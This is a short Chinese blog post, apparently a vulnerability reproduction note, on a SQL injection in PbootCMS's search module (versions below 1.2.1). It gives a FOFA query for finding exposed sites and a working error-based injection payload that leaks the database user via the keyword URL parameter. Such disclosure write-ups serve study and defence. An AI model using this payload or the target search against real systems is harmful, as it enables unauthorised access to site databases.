PbootCMS search SQL注入漏洞

漏洞描述

i ⭐PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

漏洞影响

s ✅PbootCMS < 1.2.1

空间测绘

d ⭕FOFA:app="PBOOTCMS"

漏洞复现

  • 搜索框页面为
    在这里插入图片描述

  • ✅ Payload为

/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)

在这里插入图片描述

我的个人博客

https://gylq.gitee.io/time/

版权声明:本文为qq_35938621原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。